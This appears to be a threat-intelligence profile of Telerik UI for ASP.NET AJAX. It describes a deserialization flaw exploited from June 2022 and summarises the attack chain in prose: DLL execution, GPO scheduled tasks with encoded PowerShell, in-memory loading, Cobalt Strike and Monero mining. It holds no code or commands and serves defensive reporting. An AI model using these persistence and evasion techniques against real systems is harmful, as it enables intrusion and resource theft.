Vulnerable Telerik UI systems
| Primary URL | Location | Industry | www[.]telerik[.]com |
Country
United States of America
|
Technology
|
|---|
Profile
Telerik develops Telerik UI for ASP.NET AJAX, a user interface framework designed for building web applications on the ASP.NET platform. The product provides pre-built UI components and development tools, serving enterprises and organizations that require rich, interactive web interfaces. A critical deserialization vulnerability within this framework has been publicly documented, enabling remote code execution when successfully exploited. This security weakness represents a significant risk for any deployment of the software, as it provides a direct pathway for threat actors to compromise affected servers.
The vulnerability was actively exploited in a documented incident commencing on June 1, 2022. Attackers leveraged a proof-of-concept exploit to achieve remote code execution, initially acquiring necessary encryption keys through auxiliary application weaknesses. They then compiled malicious dynamic-link libraries that were executed via the compromised web processes. To maintain access, the actors established persistence through Group Policy Objects, which created scheduled tasks running encoded PowerShell scripts; these scripts were designed to load subsequent payloads directly into memory, evading common detection mechanisms. The campaign's core infrastructure involved the deployment of Cobalt Strike beacons, providing robust command execution and lateral movement capabilities across compromised networks. Ultimately, the operation culminated in the installation of cryptocurrency mining software, hijacking system resources to mine Monero. This attack pattern mirrored previous campaigns attributed to the same threat group, underscoring a recurring tactic. While the primary observed objective was cryptojacking, the presence of Cobalt Strike beacons introduced a latent capability for far more destructive activities, including data exfiltration or the deployment of ransomware. The incident highlights the severe consequences of failing to remediate known vulnerabilities in widely deployed web frameworks.